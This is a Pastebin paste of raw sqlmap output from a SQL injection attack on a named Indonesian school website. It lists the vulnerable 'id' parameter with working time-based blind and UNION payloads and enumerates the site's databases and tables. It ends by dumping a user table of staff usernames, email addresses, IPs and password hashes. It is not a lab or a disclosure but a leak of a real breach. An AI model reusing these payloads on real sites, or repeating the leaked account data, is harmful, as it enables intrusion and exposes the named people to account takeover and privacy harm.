API tools faq
paste
Guest User

www.smkmubbs.sch.id sql injection

a guest
Nov 11th, 2016
32
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.06 KB | None | 0 0
raw download clone embed print report
  1. ==========================================================================================
  2. ==========================================================================================
  3.  
  4. www.smkmubbs.sch.id
  5. sqlmap identified the following injection point(s) with a total of 262 HTTP(s) requests:
  6. ---
  7. Parameter: id (GET)
  8. Type: AND/OR time-based blind
  9. Title: MySQL >= 5.0.12 AND time-based blind
  10. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  11.  
  12. Type: UNION query
  13. Title: Generic UNION query (NULL) - 6 columns
  14. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  15. ---
  16. web application technology: PHP 5.3.3
  17. back-end DBMS: MySQL >= 5.0.12
  18. sqlmap resumed the following injection point(s) from stored session:
  19. ---
  20. Parameter: id (GET)
  21. Type: AND/OR time-based blind
  22. Title: MySQL >= 5.0.12 AND time-based blind
  23. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  24.  
  25. Type: UNION query
  26. Title: Generic UNION query (NULL) - 6 columns
  27. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  28. ---
  29. web application technology: PHP 5.3.3
  30. back-end DBMS: MySQL >= 5.0.12
  31. available databases [22]:
  32. [*] adp
  33. [*] ak
  34. [*] bkk
  35. [*] chat
  36. [*] chattingan
  37. [*] information_schema
  38. [*] learning
  39. [*] matem
  40. [*] mysql
  41. [*] pemilihanipm
  42. [*] polling
  43. [*] ppdbkudb
  44. [*] pramuka
  45. [*] smkmubbs
  46. [*] smkweb
  47. [*] tapel1415_a
  48. [*] tapel1415_b
  49. [*] tapel1516_a
  50. [*] tapel1516_b
  51. [*] tapel1617_a
  52. [*] tkr
  53. [*] tsm
  54.  
  55. sqlmap resumed the following injection point(s) from stored session:
  56. ---
  57. Parameter: id (GET)
  58. Type: AND/OR time-based blind
  59. Title: MySQL >= 5.0.12 AND time-based blind
  60. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  61.  
  62. Type: UNION query
  63. Title: Generic UNION query (NULL) - 6 columns
  64. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  65. ---
  66. web application technology: PHP 5.3.3
  67. back-end DBMS: MySQL >= 5.0.12
  68. Database: smkweb
  69. [21 tables]
  70. +-----------------+
  71. | sh_agenda |
  72. | sh_album |
  73. | sh_berita |
  74. | sh_buku_tamu |
  75. | sh_galeri |
  76. | sh_guru_staff |
  77. | sh_info_sekolah |
  78. | sh_jabatan |
  79. | sh_kategori |
  80. | sh_kelas |
  81. | sh_komentar |
  82. | sh_mapel |
  83. | sh_materi |
  84. | sh_pengaturan |
  85. | sh_pengumuman |
  86. | sh_psb |
  87. | sh_sidebar |
  88. | sh_siswa |
  89. | sh_statistik |
  90. | sh_tema |
  91. | sh_users |
  92. +-----------------+
  93.  
  94. sqlmap resumed the following injection point(s) from stored session:
  95. ---
  96. Parameter: id (GET)
  97. Type: AND/OR time-based blind
  98. Title: MySQL >= 5.0.12 AND time-based blind
  99. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  100.  
  101. Type: UNION query
  102. Title: Generic UNION query (NULL) - 6 columns
  103. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  104. ---
  105. web application technology: PHP 5.3.3
  106. back-end DBMS: MySQL >= 5.0.12
  107. Database: smkweb
  108. [21 tables]
  109. +-----------------+
  110. | sh_agenda |
  111. | sh_album |
  112. | sh_berita |
  113. | sh_buku_tamu |
  114. | sh_galeri |
  115. | sh_guru_staff |
  116. | sh_info_sekolah |
  117. | sh_jabatan |
  118. | sh_kategori |
  119. | sh_kelas |
  120. | sh_komentar |
  121. | sh_mapel |
  122. | sh_materi |
  123. | sh_pengaturan |
  124. | sh_pengumuman |
  125. | sh_psb |
  126. | sh_sidebar |
  127. | sh_siswa |
  128. | sh_statistik |
  129. | sh_tema |
  130. | sh_users |
  131. +-----------------+
  132.  
  133. sqlmap resumed the following injection point(s) from stored session:
  134. ---
  135. Parameter: id (GET)
  136. Type: AND/OR time-based blind
  137. Title: MySQL >= 5.0.12 AND time-based blind
  138. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  139.  
  140. Type: UNION query
  141. Title: Generic UNION query (NULL) - 6 columns
  142. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  143. ---
  144. web application technology: PHP 5.3.3
  145. back-end DBMS: MySQL >= 5.0.12
  146. Database: smkweb
  147. Table: sh_users
  148. [8 columns]
  149. +--------------------+-------------+
  150. | Column | Type |
  151. +--------------------+-------------+
  152. | email_users | varchar(50) |
  153. | id_users | varchar(50) |
  154. | level_users | varchar(30) |
  155. | login_terakhir | datetime |
  156. | nama_lengkap_users | varchar(30) |
  157. | namausers | varchar(30) |
  158. | s_username | varchar(30) |
  159. | sandiusers | varchar(50) |
  160. +--------------------+-------------+
  161.  
  162. sqlmap resumed the following injection point(s) from stored session:
  163. ---
  164. Parameter: id (GET)
  165. Type: AND/OR time-based blind
  166. Title: MySQL >= 5.0.12 AND time-based blind
  167. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  168.  
  169. Type: UNION query
  170. Title: Generic UNION query (NULL) - 6 columns
  171. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  172. ---
  173. web application technology: PHP 5.3.3
  174. back-end DBMS: MySQL >= 5.0.12
  175. Database: smkweb
  176. Table: sh_users
  177. [0 entries]
  178. +----------+-------------------------+
  179. | id_users | email_users |
  180. +----------+-------------------------+
  181. +----------+-------------------------+
  182.  
  183. sqlmap resumed the following injection point(s) from stored session:
  184. ---
  185. Parameter: id (GET)
  186. Type: AND/OR time-based blind
  187. Title: MySQL >= 5.0.12 AND time-based blind
  188. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  189.  
  190. Type: UNION query
  191. Title: Generic UNION query (NULL) - 6 columns
  192. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  193. ---
  194. web application technology: PHP 5.3.3
  195. back-end DBMS: MySQL >= 5.0.12
  196. Database: tsm
  197. [21 tables]
  198. +-----------------+
  199. | sh_agenda |
  200. | sh_album |
  201. | sh_berita |
  202. | sh_buku_tamu |
  203. | sh_galeri |
  204. | sh_guru_staff |
  205. | sh_info_sekolah |
  206. | sh_jabatan |
  207. | sh_kategori |
  208. | sh_kelas |
  209. | sh_komentar |
  210. | sh_mapel |
  211. | sh_materi |
  212. | sh_pengaturan |
  213. | sh_pengumuman |
  214. | sh_psb |
  215. | sh_sidebar |
  216. | sh_siswa |
  217. | sh_statistik |
  218. | sh_tema |
  219. | sh_users |
  220. +-----------------+
  221.  
  222. sqlmap resumed the following injection point(s) from stored session:
  223. ---
  224. Parameter: id (GET)
  225. Type: AND/OR time-based blind
  226. Title: MySQL >= 5.0.12 AND time-based blind
  227. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  228.  
  229. Type: UNION query
  230. Title: Generic UNION query (NULL) - 6 columns
  231. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  232. ---
  233. web application technology: PHP 5.3.3
  234. back-end DBMS: MySQL >= 5.0.12
  235. Database: smkmubbs
  236. [85 tables]
  237. +----------------------------+
  238. | user |
  239. | calendarevent |
  240. | calendarevent_picture |
  241. | counter |
  242. | soal_hasil |
  243. | soal_jawab |
  244. | soal_kelas |
  245. | soal_opsi |
  246. | soal_test |
  247. | soal_utama |
  248. | t_absensi |
  249. | t_artikel |
  250. | t_artikel_kom |
  251. | t_banner |
  252. | t_belajar |
  253. | t_belajar_detail |
  254. | t_belajar_kls |
  255. | t_belajar_log |
  256. | t_bpbk |
  257. | t_buku |
  258. | t_chat |
  259. | t_download |
  260. | t_dsp |
  261. | t_forum |
  262. | t_forum_balas |
  263. | t_forum_isi |
  264. | t_forum_moderator |
  265. | t_galeri |
  266. | t_galerialbum |
  267. | t_gambaratas |
  268. | t_info |
  269. | t_kategori |
  270. | t_kelas |
  271. | t_laporan |
  272. | t_link |
  273. | t_member |
  274. | t_member_contact |
  275. | t_member_custom |
  276. | t_member_games |
  277. | t_member_pesan |
  278. | t_memberfoto |
  279. | t_memberfoto_album |
  280. | t_memberfoto_kom |
  281. | t_membergroup |
  282. | t_membergroup_anggota |
  283. | t_membergroup_diskusi |
  284. | t_membergroup_diskusibalas |
  285. | t_membergroup_info |
  286. | t_membergroup_infokom |
  287. | t_membergroup_jenis |
  288. | t_memberlihat |
  289. | t_memberstatus |
  290. | t_memberstatus_kom |
  291. | t_mengajar |
  292. | t_news |
  293. | t_news_kom |
  294. | t_nilai |
  295. | t_nilai_detail |
  296. | t_online |
  297. | t_pelajaran |
  298. | t_pesan |
  299. | t_pesan_alum |
  300. | t_pos_menu |
  301. | t_prestasi |
  302. | t_profil |
  303. | t_programahli |
  304. | t_project |
  305. | t_project_com |
  306. | t_semester |
  307. | t_silabus |
  308. | t_siswa |
  309. | t_soal |
  310. | t_spp |
  311. | t_staf |
  312. | t_statistik |
  313. | t_temp |
  314. | t_temp_menu |
  315. | t_thajar |
  316. | t_tugas |
  317. | t_tugas_kelas |
  318. | t_tugas_siswa |
  319. | t_voting_jawab |
  320. | t_voting_pole |
  321. | t_voting_tanya |
  322. | user_level |
  323. +----------------------------+
  324.  
  325. sqlmap resumed the following injection point(s) from stored session:
  326. ---
  327. Parameter: id (GET)
  328. Type: AND/OR time-based blind
  329. Title: MySQL >= 5.0.12 AND time-based blind
  330. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  331.  
  332. Type: UNION query
  333. Title: Generic UNION query (NULL) - 6 columns
  334. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  335. ---
  336. web application technology: PHP 5.3.3
  337. back-end DBMS: MySQL >= 5.0.12
  338. Database: smkmubbs
  339. Table: user
  340. [8 columns]
  341. +----------+--------------+
  342. | Column | Type |
  343. +----------+--------------+
  344. | email | varchar(100) |
  345. | ip | varchar(15) |
  346. | kunjung | int(11) |
  347. | password | varchar(200) |
  348. | status | int(1) |
  349. | userid | int(11) |
  350. | username | varchar(50) |
  351. | waktu | varchar(20) |
  352. +----------+--------------+
  353.  
  354. sqlmap resumed the following injection point(s) from stored session:
  355. ---
  356. Parameter: id (GET)
  357. Type: AND/OR time-based blind
  358. Title: MySQL >= 5.0.12 AND time-based blind
  359. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  360.  
  361. Type: UNION query
  362. Title: Generic UNION query (NULL) - 6 columns
  363. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  364. ---
  365. web application technology: PHP 5.3.3
  366. back-end DBMS: MySQL >= 5.0.12
  367. Database: smkmubbs
  368. Table: user
  369. [8 entries]
  370. +--------+-------------+---------------------+-----------------------------+--------+---------+-------------------+---------------------+
  371. | userid | ip | waktu | email | status | kunjung | username | password |
  372. +--------+-------------+---------------------+-----------------------------+--------+---------+-------------------+---------------------+
  373. | 3 | 10.10.10.10 | 05:41:44 28/04/2016 | javateiswanto@gmail.com | 1 | 151 | admin | 5ag8483b3c0b3bfc7bc |
  374. | 5 | 10.10.10.10 | 21:45:09 16/03/2016 | ade@gmail.com | 1 | 3 | ade_kurniawan | 57g8786858483 |
  375. | 4 | 36.73.14.0 | 16:33:31 18/12/2014 | admin2@gmail.com | 1 | 6 | admin2 | 58g84c0bbbfb6b3 |
  376. | 6 | 10.10.10.10 | 23:11:43 16/03/2016 | endah_nur_astuti@gmail.com | 1 | 2 | endah_nur_astuti | 57g8786858483 |
  377. | 7 | 10.10.10.10 | 23:19:42 16/03/2016 | riski_dwi_jayanti@gmail.com | 1 | 4 | riski_dwi_jayanti | 57g8786858483 |
  378. | 8 | 10.10.10.10 | 21:41:32 16/03/2016 | pundi_wijayanti@gmail.com | 1 | 2 | pundi_wijayanti | 57g8786858483 |
  379. | 9 | 10.10.10.10 | 23:18:18 16/03/2016 | tuti_nursiamah@gmail.com | 1 | 2 | tuti_nursiamah | 57g8786858483 |
  380. | 10 | 10.10.10.10 | 21:11:17 16/03/2016 | awit_priyatin@gmail.com | 1 | 1 | awit_priyatin | 57g8786858483 |
  381. +--------+-------------+---------------------+-----------------------------+--------+---------+-------------------+---------------------+
  382.  
  383. sqlmap resumed the following injection point(s) from stored session:
  384. ---
  385. Parameter: id (GET)
  386. Type: AND/OR time-based blind
  387. Title: MySQL >= 5.0.12 AND time-based blind
  388. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  389.  
  390. Type: UNION query
  391. Title: Generic UNION query (NULL) - 6 columns
  392. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  393. ---
  394. web application technology: PHP 5.3.3
  395. back-end DBMS: MySQL >= 5.0.12
  396. available databases [22]:
  397. [*] adp
  398. [*] ak
  399. [*] bkk
  400. [*] chat
  401. [*] chattingan
  402. [*] information_schema
  403. [*] learning
  404. [*] matem
  405. [*] mysql
  406. [*] pemilihanipm
  407. [*] polling
  408. [*] ppdbkudb
  409. [*] pramuka
  410. [*] smkmubbs
  411. [*] smkweb
  412. [*] tapel1415_a
  413. [*] tapel1415_b
  414. [*] tapel1516_a
  415. [*] tapel1516_b
  416. [*] tapel1617_a
  417. [*] tkr
  418. [*] tsm
  419.  
  420. sqlmap resumed the following injection point(s) from stored session:
  421. ---
  422. Parameter: id (GET)
  423. Type: AND/OR time-based blind
  424. Title: MySQL >= 5.0.12 AND time-based blind
  425. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  426.  
  427. Type: UNION query
  428. Title: Generic UNION query (NULL) - 6 columns
  429. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  430. ---
  431. web application technology: PHP 5.3.3
  432. back-end DBMS: MySQL >= 5.0.12
  433. Database: tsm
  434. [21 tables]
  435. +-----------------+
  436. | sh_agenda |
  437. | sh_album |
  438. | sh_berita |
  439. | sh_buku_tamu |
  440. | sh_galeri |
  441. | sh_guru_staff |
  442. | sh_info_sekolah |
  443. | sh_jabatan |
  444. | sh_kategori |
  445. | sh_kelas |
  446. | sh_komentar |
  447. | sh_mapel |
  448. | sh_materi |
  449. | sh_pengaturan |
  450. | sh_pengumuman |
  451. | sh_psb |
  452. | sh_sidebar |
  453. | sh_siswa |
  454. | sh_statistik |
  455. | sh_tema |
  456. | sh_users |
  457. +-----------------+
  458.  
  459. sqlmap resumed the following injection point(s) from stored session:
  460. ---
  461. Parameter: id (GET)
  462. Type: AND/OR time-based blind
  463. Title: MySQL >= 5.0.12 AND time-based blind
  464. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  465.  
  466. Type: UNION query
  467. Title: Generic UNION query (NULL) - 6 columns
  468. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  469. ---
  470. web application technology: PHP 5.3.3
  471. back-end DBMS: MySQL >= 5.0.12
  472. Database: tsm
  473. Table: sh_users
  474. [8 columns]
  475. +--------------------+-------------+
  476. | Column | Type |
  477. +--------------------+-------------+
  478. | email_users | varchar(50) |
  479. | id_users | varchar(50) |
  480. | level_users | varchar(30) |
  481. | login_terakhir | datetime |
  482. | nama_lengkap_users | varchar(30) |
  483. | namausers | varchar(30) |
  484. | s_username | varchar(30) |
  485. | sandiusers | varchar(50) |
  486. +--------------------+-------------+
  487.  
  488. sqlmap resumed the following injection point(s) from stored session:
  489. ---
  490. Parameter: id (GET)
  491. Type: AND/OR time-based blind
  492. Title: MySQL >= 5.0.12 AND time-based blind
  493. Payload: p=info&id=4' AND SLEEP(5) AND 'ubcJ'='ubcJ
  494.  
  495. Type: UNION query
  496. Title: Generic UNION query (NULL) - 6 columns
  497. Payload: p=info&id=-5840' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x48666767556b4849744b6445716f5073736d63744d415742416d70575048414b6357756952704c4b,0x7178707671),NULL,NULL,NULL,NULL-- KSlX
  498. ---
  499. web application technology: PHP 5.3.3
  500. back-end DBMS: MySQL >= 5.0.12
  501. Database: tsm
  502. Table: sh_users
  503. [0 entries]
  504. +----------+-------------------+
  505. | id_users | email_users |
  506. +----------+-------------------+
  507. +----------+-------------------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!